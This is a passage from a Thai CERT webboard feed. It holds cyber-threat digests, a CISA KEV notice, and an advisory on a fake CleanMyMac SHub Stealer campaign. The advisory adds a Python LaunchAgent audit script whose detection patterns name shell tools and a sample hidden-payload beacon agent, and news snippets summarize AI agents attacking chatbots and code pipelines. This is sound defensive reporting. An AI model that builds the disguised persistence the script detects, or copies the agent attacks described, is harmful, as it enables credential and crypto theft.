<a href="https://www.bankinfosecurity.com/blogs/stop-chasing-threats-start-containing-them-p-4058" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bankinfosecurity.com/blogs/stop-chasing-threats-start-containing-them-p-4058</a><br />
<a href="https://www.cyderes.com/hubfs/FINAL%20WhitePaper%20Design_02_18_26.pdf" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cyderes.com/hubfs/FINAL WhitePaper Design_02_18_26.pdf</a></li>
<li><strong>Global Cyber Attacks Remain Near Record Highs In February 2026 Despite Ransomware Decline</strong><br />
"In February 2026, global cyber attack activity remained near record levels, confirming that elevated attack volumes are becoming the new normal for organizations worldwide. The average number of weekly cyber attacks per organization reached 2,086, representing a 9.6% increase year over year, while remaining essentially flat month over month (-0.2% compared to January 2026). This stabilization at a high baseline reflects a sustained pressure environment rather than a short‑term surge."<br />
<a href="https://blog.checkpoint.com/research/global-cyber-attacks-remain-near-record-highs-in-february-2026-despite-ransomware-decline/" target="_blank" rel="noopener noreferrer nofollow ugc">https://blog.checkpoint.com/research/global-cyber-attacks-remain-near-record-highs-in-february-2026-despite-ransomware-decline/</a></li>
<li><strong>Teen Crew Caught Selling DDoS Attack Tools</strong><br />
"Seven minors who distributed online programs designed to facilitate DDoS attacks have been identified by Poland’s Central Bureau for Combating Cybercrime (CBZC). They were between 12 and 16 at the time of the crime. According to investigators, using the tools they administered, the minors attacked popular websites, including auction and sales portals, IT domains, hosting services and accommodation booking sites. The activity was profit-driven, with the suspects earning money from the operation."<br />
<a href="https://www.helpnetsecurity.com/2026/03/10/poland-minors-identified-distributing-ddos-attack-tools/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/10/poland-minors-identified-distributing-ddos-attack-tools/</a><br />
<a href="https://www.theregister.com/2026/03/10/poland_ddos_teens_bust/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/10/poland_ddos_teens_bust/</a></li>
<li><strong>Airbus CSO On Supply Chain Blind Spots, Space Threats, And The Limits Of AI Red-Teaming</strong><br />
"Pascal Andrei, CSO at Airbus, knows that the aerospace and defense sector is facing a threat environment that is evolving faster than most organizations can track. From sub-tier suppliers quietly becoming entry points for state-backed attackers, to satellites emerging as targets in an increasingly contested space domain, the risks are real and growing. In this interview with Help Net Security, Andrei addresses the blind spots that defenders are underestimating, the gap between compliance paperwork and actual security outcomes, and why current AI red-teaming models fall dangerously short."<br />
<a href="https://www.helpnetsecurity.com/2026/03/10/pascal-andrei-airbus-aerospace-defense-cybersecurity/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/10/pascal-andrei-airbus-aerospace-defense-cybersecurity/</a></li>
<li><strong>The People Behind Cyber Extortion Are Often In Their Forties</strong><br />
"Many cybercrime investigations end with arrests or indictments that reveal little about the people behind the operations. When authorities do disclose demographic details, the pattern that emerges does not match the common assumption that cyber offenders are mostly very young. Analysis in the Security Navigator 2026 report from Orange Cyberdefense points to a different age profile, with a strong concentration of offenders in mid-career adulthood."<br />
<a href="https://www.helpnetsecurity.com/2026/03/10/cyber-extortion-cybercrime-age-profile/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/10/cyber-extortion-cybercrime-age-profile/</a></li>
<li><strong>Bug Bounties Are Broken, And The Best Security Pros Are Moving On</strong><br />
"Penetration testing engagements are organized as scheduled contracts with defined scope, set testing windows, and direct communication channels with client teams. Cobalt’s 2026 Pentester Profile Report describes growing preference for penetration testing as a service (PTaaS) and contract-based testing models. Many participants prefer contract-based testing over open bug bounty programs and prioritize predictable professional income tied to guaranteed engagements. Pentesting serves as the primary occupation for a large share of this group. Most participants bring years of field experience and describe career goals centered on staying hands-on and maintaining technical standards."<br />
<a href="https://www.helpnetsecurity.com/2026/03/10/cobalt-ptaas-gains-pentester-support/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/10/cobalt-ptaas-gains-pentester-support/</a></li>
<li><strong>Only 24% Of Organizations Test Identity Recovery Every Six Months</strong><br />
"Just 24% of organizations test their identity disaster recovery plans every six months, according to new research which examined how businesses prepare for identity-focused cyber-attacks. The findings suggested that despite rising investment in identity threat detection and response (ITDR), many organizations remain poorly prepared to restore critical authentication systems after a breach. The data comes from Quest Software’s latest report, a global survey of 650 IT and security practitioners and executives. The study found that many companies place heavy emphasis on preventative controls and threat detection while neglecting response and recovery readiness."<br />
<a href="https://www.infosecurity-magazine.com/news/organizations-test-identity-sec-6/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.infosecurity-magazine.com/news/organizations-test-identity-sec-6/</a></li>
<li><strong>SIM Swaps Expose a Critical Flaw In Identity Security</strong><br />
"For years, organizations have treated mobile phone numbers as trusted identity anchors. They are used to reset passwords, deliver one-time passcodes, and verify user identity. That trust is now fundamentally misplaced. SIM swap attacks have exposed a structural weakness in how identity is verified, recovered, and monitored across consumer and enterprise systems. In a SIM swap attack, criminals persuade a mobile carrier representative — often through social engineering or insider collusion — to transfer a victim’s phone number to a SIM card under the attacker’s control."<br />
<a href="https://www.securityweek.com/sim-swaps-expose-a-critical-flaw-in-identity-security/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/sim-swaps-expose-a-critical-flaw-in-identity-security/</a></li>
<li><strong>Protecting Democracy Means Democratizing Cybersecurity. Bring On The Hackers</strong><br />
"The hacker mind is a curious way to be. To have it means to embody endless analytical curiosity, an awareness of any given rule set as just one system among many, and an ability to see any system in ways that its creators never expected. Combine this with a drive to find the bad and make things better, and you become one of the fundamental forces of the technological universe."<br />
<a href="https://www.theregister.com/2026/03/10/democratizing_security_opinion/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/10/democratizing_security_opinion/</a></li>
<li><strong>CISOs In a Pinch: A Security Analysis Of OpenClaw</strong><br />
"The viral rise of OpenClaw (formerly Clawdbot) marks the end of the "chatbot" era and the beginning of the "sovereign agent" era. While the productivity gains of having a locally hosted AI that controls your terminal are immense, the security implications are catastrophic. We are effectively granting root access to probabilistic models that can be tricked by a simple WhatsApp message. The "Lethal Trifecta" of AI security just got a fourth dimension: Persistence."<br />
<a href="https://www.trendmicro.com/en_us/research/26/c/cisos-in-a-pinch-a-security-analysis-openclaw.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.trendmicro.com/en_us/research/26/c/cisos-in-a-pinch-a-security-analysis-openclaw.html</a></li>
</ul>
<p dir="auto"><strong>Reference</strong><br />
Electronic Transactions Development Agency (ETDA) <img src="/assets/uploads/files/1773212886084-8da35d7e-f7da-4e0e-bff6-1e3a7e12505e-image.png" alt="8da35d7e-f7da-4e0e-bff6-1e3a7e12505e-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2685/cyber-threat-intelligence-11-march-2026</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2685/cyber-threat-intelligence-11-march-2026</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Wed, 11 Mar 2026 07:08:38 GMT</pubDate></item><item><title><![CDATA[🚨 Warning for Mac users: fake CleanMyMac websites are spreading widely, tricking victims into running commands that steal passwords and crypto]]></title><description><![CDATA[<p dir="auto">The national computer security coordination center (ThaiCERT) has been monitoring the cyber security situation and finds that threats against macOS continue to rise. Most recently, security researchers uncovered a campaign spreading the "SHub Stealer" malware disguised as the popular cleanup utility CleanMyMac, built to steal digital assets and sensitive data, in line with the global trend of attacks aimed at cryptocurrency wallets.</p>
<ol>
<li>
<p dir="auto">Who is at risk<br />
Mac users looking for system cleanup software, and anyone holding cryptocurrency in applications such as Exodus, Ledger or Trezor.<br />
This group is at high risk because the attackers built the malware specifically to raid cryptocurrency wallets and to pull the passwords saved in the macOS Keychain.</p>
</li>
<li>
<p dir="auto">Attack pattern observed<br />
2.1 Tricking the user into running a malicious script by hand: the fake website tells the victim to copy a command and paste it into Terminal. Because the victim runs it themselves, the malware slips past Gatekeeper, the Mac's built-in protection.<br />
2.2 Evading detection: the malware checks the keyboard language and exits immediately if it finds Russian, to avoid scrutiny and attention from law enforcement in the developers' own region.<br />
2.3 Stealing sensitive data: the malware shows a fake dialog asking for the Mac's login password. If the user enters it, the attacker immediately gains access to every password stored in the Keychain, including Wi-Fi credentials.<br />
2.4 Tampering with crypto wallets: the malware modifies popular wallet apps to show a fake prompt for the "recovery phrase (seed phrase)". If it is entered, the attacker can drain all of the victim's crypto.<br />
2.5 Stealthy persistence: the malware installs a background job (LaunchAgent) with a file name imitating Google's legitimate update component (Keystone) and uses it to send data back to the attacker every minute.</p>
</li>
</ol>
<p dir="auto">What makes "SHub Stealer" dangerous is that it hides on the machine by posing as a Google update file. That lets it keep running in the background and continuously send data back to the attackers, who can then control the machine and pull further data at any time.</p>
<ol start="3">
<li>How to protect yourself and respond<br />
3.1 Download software only from the developer's official website or from the Mac App Store.<br />
3.2 Check the website URL carefully every time, making sure it is spelled correctly with no altered characters, before downloading any program.<br />
3.3 Never copy commands from unfamiliar websites into Terminal if you do not understand what the command does.<br />
3.4 Be wary of pop-ups asking for your Mac password or a crypto seed phrase; if the wording looks odd or contains spelling or grammar mistakes, do not enter anything.<br />
3.5 Keep macOS and any antivirus software updated to the latest version to close security holes.</li>
</ol>
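<p dir="auto">An added example, written for this post and not taken from Hackread or the researchers: a Python audit of a LaunchAgents folder that flags the persistence traits described in 2.5, namely a Google Keystone-style label whose executable is not under Google's install directory, a shell interpreter as the program, a payload kept in a hidden dot-directory or scratch location, and a StartInterval of 60 seconds or less. The sample agents, the look-alike label com.google.keystone.xpcservice, the payload path and the vendor-directory list are constructed assumptions for this example; the audit itself runs on any Mac with Python 3.</p>

```python
import plistlib
import tempfile
from pathlib import Path, PurePosixPath

# Assumption for this example: genuine Google update (Keystone) binaries live
# under these directories, so a com.google.* label pointing elsewhere is odd.
VENDOR_DIRS = {"com.google.": ("/Library/Google/", "/Applications/Google ")}
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl", "curl"}
SCRATCH_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")


def program_path(agent: dict) -> str:
    """Executable a LaunchAgent runs: Program, else ProgramArguments[0]."""
    args = agent.get("ProgramArguments") or []
    return str(agent.get("Program") or (args[0] if args else ""))


def audit_launch_agent(agent: dict, in_user_dir: bool = True) -> list:
    """Return the names of suspicious traits found in one parsed LaunchAgent."""
    findings = []
    label = str(agent.get("Label", ""))
    prog = program_path(agent)
    args = [str(a) for a in (agent.get("ProgramArguments") or [])]

    # Apple ships its own agents under /System/Library, not ~/Library/LaunchAgents.
    if in_user_dir and label.startswith("com.apple."):
        findings.append("apple_label_in_user_launchagents")
    # Vendor-style label whose executable is not in that vendor's install location.
    for prefix, dirs in VENDOR_DIRS.items():
        if label.startswith(prefix) and not any(d in prog for d in dirs):
            findings.append("vendor_label_path_mismatch")
    # A shell or script interpreter as the program usually means an inline dropper.
    if PurePosixPath(prog).name in INTERPRETERS:
        findings.append("interpreter_as_program")
    # Payload hidden in a dot-directory or staged in a scratch location.
    candidate_paths = [prog] + args[1:]
    if any(part.startswith(".") and part not in (".", "..")
           for p in candidate_paths for part in PurePosixPath(p).parts):
        findings.append("hidden_path_component")
    if any(p.startswith(SCRATCH_DIRS) for p in candidate_paths):
        findings.append("scratch_directory_payload")
    # Beaconing every minute or faster, as the post describes for the exfil channel.
    interval = agent.get("StartInterval")
    if isinstance(interval, int) and not isinstance(interval, bool) and interval <= 60:
        findings.append("start_interval_60s_or_less")
    return findings


def audit_directory(directory) -> dict:
    """Parse every *.plist in a LaunchAgents folder and audit each one."""
    results = {}
    for plist_file in sorted(Path(directory).glob("*.plist")):
        try:
            with plist_file.open("rb") as fh:
                agent = plistlib.load(fh)
        except Exception:  # malformed XML/binary plist or unreadable file
            results[plist_file.name] = ["unparseable_plist"]
            continue
        results[plist_file.name] = audit_launch_agent(agent)
    return results


# Constructed sample agents (not from the article). The first approximates a
# genuine Keystone agent; the second is a hypothetical look-alike showing the
# traits described: vendor-style label, hidden user-writable payload, 60 s beacon.
SAMPLES = {
    "com.google.keystone.agent.plist": {
        "Label": "com.google.keystone.agent",
        "ProgramArguments": [
            "/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Resources/"
            "GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent",
            "-runMode", "ifneeded"],
        "RunAtLoad": True,
        "StartInterval": 3523,
    },
    "com.google.keystone.xpcservice.plist": {
        "Label": "com.google.keystone.xpcservice",
        "ProgramArguments": ["/bin/bash", "-c", "/Users/jane/Library/Application Support/.ks/update"],
        "RunAtLoad": True,
        "StartInterval": 60,
    },
    "com.example.backup.plist": {
        "Label": "com.example.backup",
        "ProgramArguments": ["/usr/local/bin/backup", "--quiet"],
        "StartInterval": 3600,
    },
}


def audit_samples_on_disk() -> dict:
    """Write the samples as XML plists into a temp folder and audit it like a real one."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, agent in SAMPLES.items():
            (Path(tmp) / name).write_bytes(plistlib.dumps(agent))
        return audit_directory(tmp)


if __name__ == "__main__":
    for name, findings in audit_samples_on_disk().items():
        print(f"{name:40} {'SUSPICIOUS' if findings else 'ok':10} {findings}")
    # On a real Mac: audit_directory(Path.home() / "Library/LaunchAgents")
```

<p dir="auto">Only the look-alike agent produces findings; the genuine-looking Keystone entry and an ordinary backup agent pass clean. Each finding alone is weak (plenty of legitimate tools use a shell wrapper), so treat two or more together as the trigger for a closer look at the referenced binary.</p>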
<p dir="auto">🔗 Source: Hackread (<a href="https://dg.th/i7aehpvk1n" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/i7aehpvk1n</a>)<br />
#CyberSecurity #macOS #CleanMyMac #MalwareAlert #CryptoSecurity #SHubStealer #Infostealer</p>
<p dir="auto"><img src="/assets/uploads/files/1773137515310-cleanmymac-resized.png" alt="CleanMyMac.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2684/เต-อนภ-ยผ-ใช-mac-เว-บไซต-cleanmymac-ปลอมระบาดหน-ก-พบใช-เทคน-คหลอกร-นคำส-ง-ขโมยรห-สผ-านและคร-ปโต</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2684/เต-อนภ-ยผ-ใช-mac-เว-บไซต-cleanmymac-ปลอมระบาดหน-ก-พบใช-เทคน-คหลอกร-นคำส-ง-ขโมยรห-สผ-านและคร-ปโต</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Tue, 10 Mar 2026 10:12:07 GMT</pubDate></item><item><title><![CDATA[CISA adds three exploited vulnerabilities to its catalog]]></title><description><![CDATA[<p dir="auto">On 9 March 2026 the Cybersecurity and Infrastructure Security Agency (CISA) added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation:</p>
<ul>
<li>CVE-2021-22054 Omnissa Workspace ONE Server-Side Request Forgery</li>
<li>CVE-2025-26399 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability</li>
<li>CVE-2026-1603 Ivanti Endpoint Manager (EPM) Authentication Bypass Vulnerability</li>
</ul>
<p dir="auto">CISA keeps updating the KEV catalog and adding newly exploited vulnerabilities so that it reflects the risks actually being observed, now and going forward.</p>
<p dir="auto">Reference<br />
<a href="https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog</a><br />
Follow further updates on the webboard or on the NCSA Thailand Facebook page <img src="/assets/uploads/files/1773133834946-5fc7994a-c59a-4219-b85a-e9534be80af3-image.png" alt="5fc7994a-c59a-4219-b85a-e9534be80af3-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2683/cisa-เพ-มช-องโหว-ท-ถ-กใช-โจมต-3-รายการลงในแคตตาล-อก</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2683/cisa-เพ-มช-องโหว-ท-ถ-กใช-โจมต-3-รายการลงในแคตตาล-อก</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Tue, 10 Mar 2026 09:10:37 GMT</pubDate></item><item><title><![CDATA[Cyber Threat Intelligence 10 March 2026]]></title><description><![CDATA[<p dir="auto"><strong>Industrial Sector</strong></p>
<ul>
<li><strong>Portwell Engineering Toolkits</strong><br />
"Successful exploitation of this vulnerability could allow a local attacker to escalate privileges or cause a denial-of-service condition."<br />
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-04" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-04</a></li>
<li><strong>Labkotec LID-3300IP</strong><br />
"Successful exploitation of this vulnerability could allow attackers to gain unauthorized control over system operations, leading to disruption of normal functionality and potential safety hazards."<br />
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-05" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-05</a></li>
<li><strong>Mobiliti e-Mobi.hu</strong><br />
"Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."<br />
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-06" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-06</a></li>
<li><strong>ePower Epower.ie</strong><br />
"Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."<br />
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-07" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-07</a></li>
<li><strong>Everon OCPP Backends</strong><br />
"Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."<br />
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-08" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-08</a></li>
<li><strong>Mitsubishi Electric MELSEC iQ-F Series EtherNet/IP Module And Ethernet Module</strong><br />
"Successful exploitation of these vulnerabilities could allow a remote attacker to cause a denial-of-service condition by continuously sending UDP packets to the affected products."<br />
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-62-01" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/ics-advisories/icsa-26-62-01</a></li>
<li><strong>Hitachi Energy Relion REB500 Product</strong><br />
"Hitachi Energy is aware of vulnerabilities that affect the Relion REB500 product versions listed in this document. Authenticated users with certain roles can exploit the vulnerabilities to access and modify the directory contents they are not authorized to do so. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation."<br />
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-02" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-02</a></li>
<li><strong>Hitachi Energy RTU500 Product</strong><br />
"Hitachi Energy is aware of vulnerabilities that affect RTU500 product versions listed in this document. Successful exploitation of these vulnerabilities can result in the exposure of low-value user management information and device outage. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation."<br />
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-03" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-03</a></li>
<li><strong>Delta Electronics CNCSoft-G2</strong><br />
"Successful exploitation of this vulnerability could result in an attacker achieving remote code execution on the device."<br />
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-064-01" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/ics-advisories/icsa-26-064-01</a></li>
</ul>
<p dir="auto"><strong>New Tooling</strong></p>
<ul>
<li><strong>DumpBrowserSecrets – Browser Credential Harvesting With App-Bound Encryption Bypass</strong><br />
"DumpBrowserSecrets is a post-exploitation credential-harvesting tool from Maldev Academy that extracts secrets across all major browsers from a single Windows executable. It is the successor to their earlier DumpChromeSecrets project, which is now deprecated, and extends coverage from Chrome alone to the full range of Chromium-based and Gecko-based browsers in common enterprise use."<br />
<a href="https://www.darknet.org.uk/2026/03/dumpbrowsersecrets-browser-credential-harvesting-with-app-bound-encryption-bypass/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.darknet.org.uk/2026/03/dumpbrowsersecrets-browser-credential-harvesting-with-app-bound-encryption-bypass/</a><br />
<a href="https://github.com/Maldev-Academy/DumpBrowserSecrets" target="_blank" rel="noopener noreferrer nofollow ugc">https://github.com/Maldev-Academy/DumpBrowserSecrets</a></li>
</ul>
<p dir="auto"><strong>Vulnerabilities</strong></p>
<ul>
<li><strong>CISA Adds Three Known Exploited Vulnerabilities To Catalog</strong><br />
"CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.<br />
CVE-2021-22054 Omnissa Workspace ONE Server-Side Request Forgery<br />
CVE-2025-26399 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability<br />
CVE-2026-1603 Ivanti Endpoint Manager (EPM) Authentication Bypass Vulnerability"<br />
<a href="https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog</a></li>
<li><strong>Partnering With Mozilla To Improve Firefox’s Security</strong><br />
"AI models can now independently identify high-severity vulnerabilities in complex software. As we recently documented, Claude found more than 500 zero-day vulnerabilities (security flaws that are unknown to the software’s maintainers) in well-tested open-source software. In this post, we share details of a collaboration with researchers at Mozilla in which Claude Opus 4.6 discovered 22 vulnerabilities over the course of two weeks. Of these, Mozilla assigned 14 as high-severity vulnerabilities—almost a fifth of all high-severity Firefox vulnerabilities that were remediated in 2025. In other words: AI is making it possible to detect severe security vulnerabilities at highly accelerated speeds."<br />
<a href="https://www.anthropic.com/news/mozilla-firefox-security" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.anthropic.com/news/mozilla-firefox-security</a><br />
<a href="https://securityaffairs.com/189131/ai/anthropic-claude-opus-ai-model-discovers-22-firefox-bugs.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/189131/ai/anthropic-claude-opus-ai-model-discovers-22-firefox-bugs.html</a></li>
<li><strong>AI Vs AI: Agent Hacked McKinsey's Chatbot And Gained Full Read-Write Access In Just Two Hours</strong><br />
"Researchers at red-team security startup CodeWall say their AI agent hacked McKinsey's internal AI platform and gained full read and write access to the chatbot in just two hours. It's yet another indicator that agentic AI is becoming a more effective tool for conducting cyberattacks, including those against other AI systems. This attack wasn’t conducted with malicious intent. However, threat hunters tell us that miscreants are increasingly using agents in real-world attacks, indicating that machine-speed intrusions aren't going away."<br />
<a href="https://www.theregister.com/2026/03/09/mckinsey_ai_chatbot_hacked/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/09/mckinsey_ai_chatbot_hacked/</a></li>
</ul>
<p dir="auto"><strong>Malware</strong></p>
<ul>
<li><strong>New A0Backdoor Linked To Teams Impersonation And Quick Assist Social Engineering</strong><br />
"BlueVoyant Security Operations Center (SOC) and Threat Fusion Cell (TFC) continue to track an activity cluster that uses email bombing and IT-support impersonation over Microsoft Teams to obtain Quick Assist access, then pivot to a deeper attack. This research shows that once on the victim’s host, the actors sideload a malicious DLL to deliver a new backdoor BlueVoyant has dubbed the A0Backdoor. The malware’s loader exhibits anti-sandbox evasion, and the campaign’s command-and-control appears to have pivoted to a covert DNS mail exchange-based channel that confines endpoint traffic to trusted recursive resolvers."<br />
<a href="https://www.bluevoyant.com/blog/new-a0backdoor-linked-to-teams-impersonation-and-quick-assist-social-engineering" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bluevoyant.com/blog/new-a0backdoor-linked-to-teams-impersonation-and-quick-assist-social-engineering</a><br />
<a href="https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-targets-employees-with-backdoors/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-targets-employees-with-backdoors/</a></li>
<li><strong>ShinyHunters Claims Ongoing Salesforce Aura Data Theft Attacks</strong><br />
"Salesforce is warning customers that hackers are targeting websites with misconfigured Experience Cloud platforms that give guest users access to more data than intended. However, the ShinyHunters extortion gang claims to be actively exploiting a new bug to steal data from instances. Salesforce has shared guidance for its customers to defend against hackers actively targeting the /s/sfsites/aura API endpoint on misconfigured Experience Cloud instances that gives guest users access to more data than intended. The company states that attackers are deploying a modified version of AuraInspector, an open-source auditing tool developed by Mandiant, which can help administrators identify access control misconfigurations within the Salesforce Aura framework."<br />
<a href="https://www.bleepingcomputer.com/news/security/shinyhunters-claims-ongoing-salesforce-aura-data-theft-attacks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/shinyhunters-claims-ongoing-salesforce-aura-data-theft-attacks/</a><br />
<a href="https://www.salesforce.com/blog/protecting-your-data-essential-actions-to-secure-experience-cloud-guest-user-access/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.salesforce.com/blog/protecting-your-data-essential-actions-to-secure-experience-cloud-guest-user-access/</a><br />
<a href="https://www.theregister.com/2026/03/09/shinyhunters_claims_more_highprofile_victims/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/09/shinyhunters_claims_more_highprofile_victims/</a></li>
<li><strong>FBI Warns Of Phishing Attacks Impersonating US City, County Officials</strong><br />
"The Federal Bureau of Investigation (FBI) warns that criminals are impersonating U.S. officials in phishing attacks targeting businesses and individuals who request city and county planning and zoning permits. In a public service announcement published on Monday, the bureau said that the criminals behind this campaign are identifying potential victims using publicly available information, which also makes their malicious messages seem legitimate and helps them trick suspicious targets."<br />
<a href="https://www.bleepingcomputer.com/news/security/fbi-warns-of-phishing-attacks-impersonating-us-city-county-officials/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/fbi-warns-of-phishing-attacks-impersonating-us-city-county-officials/</a><br />
<a href="https://www.ic3.gov/PSA/2026/PSA260309" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.ic3.gov/PSA/2026/PSA260309</a><br />
<a href="https://securityaffairs.com/189165/cyber-crime/fbi-alert-scammers-target-zoning-permit-applicants.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/189165/cyber-crime/fbi-alert-scammers-target-zoning-permit-applicants.html</a></li>
<li><strong>China-Nexus Activity Against Qatar Observed Amid Expanding Regional Tensions</strong><br />
"Since the recent escalation in the Middle East, Check Point Research has observed increased activity by Chinese-nexus APT actors in the region, particularly targeting Qatar. The Chinese-nexus threat actor Camaro Dragon attempted to deploy a variant of PlugX malware against Qatari targets within one day of the launch of Operation Epic Fury and the onset of the escalation in the Middle East. The attackers leveraged the ongoing war in the Middle East to make their lures more credible and engaging, demonstrating the ability to rapidly adapt to major developments and breaking news."<br />
<a href="https://blog.checkpoint.com/research/china-nexus-activity-against-qatar-observed-amid-expanding-regional-tensions/" target="_blank" rel="noopener noreferrer nofollow ugc">https://blog.checkpoint.com/research/china-nexus-activity-against-qatar-observed-amid-expanding-regional-tensions/</a></li>
<li><strong>ACSC, NCSC, And CERT Tonga Warn Of Growing INC Ransom Activity Targeting Healthcare And Organizations Across Australia, New Zealand, And Pacific States</strong><br />
"Cybersecurity agencies across the Pacific region are sharing concerns about the ransomware group INC Ransom’s expanding activities and the growing influence of its affiliate network. A joint advisory issued by the Australian Cyber Security Centre (ACSC), National Computer Emergency Response Team Tonga (CERT Tonga), and the New Zealand National Cyber Security Centre (NCSC) highlights how the INC Ransom ecosystem has become an active threat to organizations in Australia, New Zealand, and Pacific Island states."<br />
<a href="https://cyble.com/blog/inc-ransom-attacks-australia-new-zealand/" target="_blank" rel="noopener noreferrer nofollow ugc">https://cyble.com/blog/inc-ransom-attacks-australia-new-zealand/</a></li>
<li><strong>Hackerbot-Claw: Adversarial Agent Targets Top GitHub Repos</strong><br />
"Pillar Security researchers analyzed the hackerbot-claw campaign, which we named “Chaos Agent” - the first publicly documented campaign where an AI agent, operating on natural-language instructions, conducted an end-to-end attack against production open-source infrastructure. Within 37 hours, hackerbot-claw identified vulnerable open-source projects, crafted targeted exploits, compromised CI/CD pipelines, and published a malicious extension that turned developers' own AI coding tools into credential-stealing accomplices."<br />
<a href="https://www.pillar.security/blog/hackerbot-claw-adversarial-agent-targets-top-github-repos" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.pillar.security/blog/hackerbot-claw-adversarial-agent-targets-top-github-repos</a><br />
<a href="https://hackread.com/ai-bot-hackerbot-claw-microsoft-datadog-github-repos/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/ai-bot-hackerbot-claw-microsoft-datadog-github-repos/</a></li>
<li><strong>Someone Else’s SIEM: A Threat Actor Abuses Another Free Trial</strong><br />
